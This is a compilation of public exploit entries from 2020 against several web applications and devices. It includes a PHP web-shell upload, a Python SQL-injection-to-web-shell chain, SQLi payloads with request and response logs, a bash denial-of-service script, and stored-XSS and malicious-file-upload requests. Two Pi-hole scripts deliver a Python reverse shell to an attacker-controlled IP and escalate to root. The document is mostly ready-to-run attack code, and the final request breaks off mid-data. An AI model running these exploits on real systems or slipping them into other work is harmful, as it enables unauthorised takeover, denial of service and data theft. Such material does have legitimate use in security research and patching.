ISHACK AI BOT

# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload # Date: 2020-05-05 # Exploit Author: Sushant Kamble and Saurav Shukla # Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: Products.php #Exploit Open Products.php and select any product Fill details Create php shell code with below script <?php echo shell_exec($_GET['e'].' 2>&1'); ?> Click on upload Image Select php file Click Submet Access below URL: http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir add system commands after e to execute it.

# Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution # Exploit Author: Bobby Cooke # Date: 2020-05-05 # Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE) # Vulnerable Source Code: # /e-learningsystem/admin/login.php # 121 $email = trim($_POST['user_email']); # 122 $upass = trim($_POST['user_pass']); # 123 $h_upass = sha1($upass); # 132 $user = new User(); # 134 $res = $user::userAuthentication($email, $h_upass); # /e-learningsystem/include/accounts.php # 3 class User { # 23 static function userAuthentication($email,$h_pass){ # 25 $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'"); # /e-learningsystem/admin/modules/lesson/edit.php # 6 @$id = $_GET['id']; # 7 if($id==''){ # 10 $lesson = New Lesson(); # 11 $res = $lesson->single_lesson($id); # /e-learningsystem/include/lessons.php # 4 class Lesson { # 5 protected static $tblname = "tbllesson"; # 35 function single_lesson($id=0){ # 37-38 $mydb->setQuery("SELECT * FROM ".self::$tblname." Where LessonID= '{$id}' LIMIT 1"); import requests, sys, re requests.packages.urllib3.\ disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) def webshell(SERVER_URL): try: while True: cmd = raw_input('C:\\ ') command = {'cmd': cmd} r2 = s.get(SERVER_URL+'../../../../webshell.php', params=command, verify=False) response = r2.text cleanResponse = response.replace('AAAAAAAAAAAAAAA', '') cleanResponse = cleanResponse.replace('313371337', '') print(cleanResponse) except: print("\r\nExiting.") sys.exit(-1) if __name__ == "__main__": if len(sys.argv) != 2: print "(+) Usage: %s <SERVER_URL>" % sys.argv[0] print "(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0] sys.exit(-1) SERVER_URL = sys.argv[1] ADMIN_URL = SERVER_URL + 'admin/login.php' LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php' s = requests.Session() s.get(SERVER_URL, verify=False) payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp", 'user_pass': 'InstantTransmission', 'btnLogin': ''} s.post(ADMIN_URL, data=payload1, verify=False) payload2 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'} r1 = s.get(LESSON_URL, params=payload2, verify=False) dirtyPath = str(re.findall(r'"Title" type="text" value=".*>', r1.text)) dataPath=re.sub('^.*"Title" type="text" value="', '', dirtyPath) dataPath=re.sub('">.*$', '', dataPath) dataPath=dataPath.replace('\\\\', '/') xamppPath=re.sub('xampp.*', 'xampp', dataPath) payload3 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","<?php echo shell_exec($_GET[\'cmd\']);?>","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \''+xamppPath+'/htdocs/webshell.php\' -- kamahamaha'} print(payload3) s.get(LESSON_URL, params=payload3, verify=False) webshell(SERVER_URL)

# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection # Google Dork: N/A # Date: 2020-05-07 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Discription: The Online AgroCulture Farm Management System v1.0 application is vulnerable to SQL injection via the 'pid' parameter on the review.php page. # vulnerable file : review.php http://localhost/AgroCulture/review.php?pid=27 Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli GET AgroCulture/review.php?pid=27 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m Connection: keep-alive Upgrade-Insecure-Requests: 1 pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN

# Exploit title : Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC) # Exploit Author : LiquidWorm # Date : 2020-05-06 # Vendor: Extreme Networks # Product web page: https://www.extremenetworks.com # Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf # Affected version: <=11.x #!/bin/bash # # # Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit # # # Vendor: Extreme Networks # Product web page: https://www.extremenetworks.com # Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf # Affected version: <=11.x # # Summary: Aerohive HiveOS is the network operating system that powers # all Aerohive access points, based on a feature-rich Cooperative Control # architecture. HiveOS enables Aerohive devices to organize into groups, # or 'hives', which allows functionality like fast roaming, user-based # access control and fully stateful application-aware firewall policies, # as well as additional security and RF networking features - all without # the need for a centralized or dedicated controller. # # Desc: An unauthenticated malicious user can trigger a Denial of Service # (DoS) attack when sending specific application layer packets towards the # Aerohive NetConfig UI. This PoC exploit renders the application unusable # for 305 seconds or 5 minutes with a single HTTP request using the action.php5 # script calling the CliWindow function thru the _page parameter, denying # access to the web server hive user interface. # # Vendor mitigation: # CLI> no system web-server hive-ui enable # # Tested on: Hiawatha v9.6 # # # Vulnerability discvered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5566 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5566.php # # # 05.12.2019 # if [ "$#" -ne 1 ]; then echo -ne "\nUsage: $0 [ipaddr]\n\n" exit fi IP=$1 SBYTES=`echo -e \ "\x61\x63\x74\x69\x6f\x6e\x2e"\ "\x70\x68\x70\x35\x3f\x5f\x70"\ "\x61\x67\x65\x3d\x43\x6c\x69"\ "\x57\x69\x6e\x64\x6f\x77\x26"\ "\x5f\x61\x63\x74\x69\x6f\x6e"\ "\x3d\x67\x65\x74\x26\x5f\x61"\ "\x63\x74\x69\x6f\x6e\x54\x79"\ "\x70\x65\x3d\x31"`##_000000251 curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe"

#!/usr/bin/env python3 # Pi-hole <= 4.4 RCE # Author: Nick Frichette # Homepage: https://frichetten.com # # Note: This exploit must be run with root privileges and port 80 must not be occupied. # While it is possible to exploit this from a non standard port, for the sake of # simplicity (and not having to modify the payload) please run it with sudo privileges. # Or setup socat and route it through there? import requests import sys import socket import _thread import time if len(sys.argv) < 4: print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*") print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.") exit() SESSION = dict(PHPSESSID=sys.argv[1]) TARGET_IP = sys.argv[2] LOCAL_IP = sys.argv[3] LOCAL_PORT = sys.argv[4] if len(sys.argv) == 6: ROOT = True # Surpress https verify warnings # I'm asuming some instances will use self-signed certs requests.packages.urllib3.disable_warnings() # Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet # I opted to use the Python3 reverse shell one liner over the full PHP reverse shell. payload = """<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> """ %(LOCAL_IP, LOCAL_PORT) def send_response(thread_name): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((LOCAL_IP,int(80))) sock.listen(5) connected = False while not connected: conn,addr = sock.accept() if thread_name == "T1": print("[+] Received First Callback") conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") else: print("[+] Received Second Callback") print("[+] Uploading Payload") conn.sendall(bytes(payload, "utf-8")) conn.close() connected = True sock.close() _thread.start_new_thread(send_response,("T1",)) # Fetch token resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False) response = str(resp.content) token_loc = response.find("name=\"token\"") token = response[token_loc+20:token_loc+64] # Make request with token data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) if resp.status_code == 200: print("[+] Put Stager Success") # Update gravity resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(3) _thread.start_new_thread(send_response,("T2",)) # Update again to trigger upload resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) print("[+] Triggering Exploit") try: requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False) except: # We should be silent to avoid filling the cli window None

#!/usr/bin/env python3 # Pi-hole <= 4.4 RCE # Author: Nick Frichette # Homepage: https://frichetten.com # # Note: This exploit must be run with root privileges and port 80 must not be occupied. # While it is possible to exploit this from a non standard port, for the sake of # simplicity (and not having to modify the payload) please run it with sudo privileges. # Or setup socat and route it through there? import requests import sys import socket import _thread import time if len(sys.argv) < 4: print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*") print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.") exit() SESSION = dict(PHPSESSID=sys.argv[1]) TARGET_IP = sys.argv[2] LOCAL_IP = sys.argv[3] LOCAL_PORT = sys.argv[4] # Surpress https verify warnings # I'm asuming some instances will use self-signed certs requests.packages.urllib3.disable_warnings() # Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet # I opted to use the Python3 reverse shell one liner over the full PHP reverse shell. shell_payload = """<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> """ %(LOCAL_IP, LOCAL_PORT) root_payload = """<?php shell_exec("sudo pihole -a -t") ?> """ def send_response(thread_name): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((LOCAL_IP,int(80))) sock.listen(5) connected = False while not connected: conn,addr = sock.accept() if thread_name == "T1": print("[+] Received First Callback") conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") elif thread_name == "T2": print("[+] Received Second Callback") print("[+] Uploading Root Payload") conn.sendall(bytes(root_payload, "utf-8")) elif thread_name == "T3": print("[+] Received Third Callback") conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") else: print("[+] Received Fourth Callback") print("[+] Uploading Shell Payload") conn.sendall(bytes(shell_payload, "utf-8")) conn.close() connected = True sock.close() _thread.start_new_thread(send_response,("T1",)) # Fetch token resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False) response = str(resp.content) token_loc = response.find("name=\"token\"") token = response[token_loc+20:token_loc+64] # Make request with token data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) if resp.status_code == 200: print("[+] Put Root Stager Success") # Update gravity resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(3) _thread.start_new_thread(send_response,("T2",)) # Update again to trigger upload of root redirect resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(1) _thread.start_new_thread(send_response,("T3",)) data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) if resp.status_code == 200: print("[+] Put Shell Stager Success") resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(1) _thread.start_new_thread(send_response,("T4",)) resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) print("[+] Triggering Exploit") try: requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False) except: # We should be silent to avoid filling the cli window None

# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection # Date: 2020-05-06 # Exploit Author: Tarun Sehgal # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: uname # Injected Request #Below request will print database name and MariaDB version. POST /fms/Login/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 204 Origin: http://localhost Connection: close Referer: http://localhost/fms/index.php Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco Upgrade-Insecure-Requests: 1 uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1 ----------------------------------------------------------------------------------------------------------------------------- #Response HTTP/1.1 302 Found Date: Wed, 06 May 2020 13:21:36 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5 X-Powered-By: PHP/7.4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: error.php Content-Length: 356 Connection: close Content-Type: text/html; charset=UTF-8 <b>Warning</b>: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in <b>

# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting # Dork: N/A # Date: 2020-05-06 # Exploit Author: Vulnerability-Lab # Vendor: http://www.sentrifugo.com/ # Link: http://www.sentrifugo.com/download # Version: 3.2 # Category: Webapps # CVE: N/A Document Title: =============== Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2229 Product & Service Introduction: =============================== http://www.sentrifugo.com/ http://www.sentrifugo.com/download Affected Product(s): ==================== Sentrifugo Product: Sentrifugo v3.2 - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-05: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Mahara v19.10.2 CMS web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `expense_name` parameters of the `/expenses/expenses/edit` module in the `index.php` file. Remote attackers with low privileges are able to inject own malicious persistent script code as expenses entry. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Entries of expenses can be reviewed in the backend by higher privileged accounts as well. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] index.php/expenses/expenses/edit Vulnerable Input(s): [+] Expenses Name Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] expense_name Affected Module(s): [+] index.php/expenses/expenses Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Vulnerable Source <div id="maincontentdiv"> <div id="dialog-confirm" style="display:none;"> <div class="newframe-div"> <div class="new-form-ui height32"> <div class="division"> <input type="text" maxlength="12" id="number_value" name="number_value"></div> <span class="errors" id="errors-contactnumber"></span></div></div></div> <div id="empstatus-alert" style="display:none;"> <div class="newframe-div"><div id="empstatusmessage"></div></div></div> <div id="empleaves-alert" style="display:none;"> <div class="newframe-div"><div id="empleavesmessage"></div></div></div> --- PoC Session Logs [POST] --- (Expenses Inject) http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Host: sentrifugo.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 352 Origin: http://sentrifugo.localhost:8080 Connection: keep-alive Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87; _ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443 id=&limit=&offset=&parameter=all&currencyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=& expense_name=<img src="evil.source" onload=alert(document.domain)>&category_id=&project_id=&expense_date=&expense_currency_id=2& expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save - POST: HTTP/1.1 200 OK Server: Apache/2.2.22 (Ubuntu) X-Powered-By: PHP/5.3.10-1ubuntu3.10 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 19284 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Reference(s): http://sentrifugo.localhost:8080/index.php http://sentrifugo.localhost:8080/index.php/expenses http://sentrifugo.localhost:8080/index.php/expenses/expenses/ http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: Kartris 1.6 - Arbitrary File Upload # Dork: N/A # Date: 2020-05-08 # Exploit Author: Nhat Ha - Sun CSR # Vendor Homepage: https://www.cactusoft.com/ # Software Link: https://www.kartris.com/ # Version: 1.6 # Category: Webapps # Tested on: WiN10_x64/KaLiLinuX_x64 # CVE: N/A # POC: https://localhost/Admin/_GeneralFiles.aspx # POST /Admin/_GeneralFiles.aspx HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9604487443072642880454762058 Content-Length: 18484 Origin: 192.168.1.1 Connection: close Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096; ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w; KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx Upgrade-Insecure-Requests: 1 -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="scrManager_HiddenField" ;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1; -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_ExpandState" cccccccccc -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_SelectedNode" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_PopulateLog" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$scrManager" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$phdMain$filUploader"; filename="malicious.aspx" Content-Type: text/plain [Content Malicious File Here ! ] -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth" 170px -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth" 500px -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__EVENTTARGET" ctl00$phdMain$lnkUpload -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__EVENTARGUMENT" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATE" 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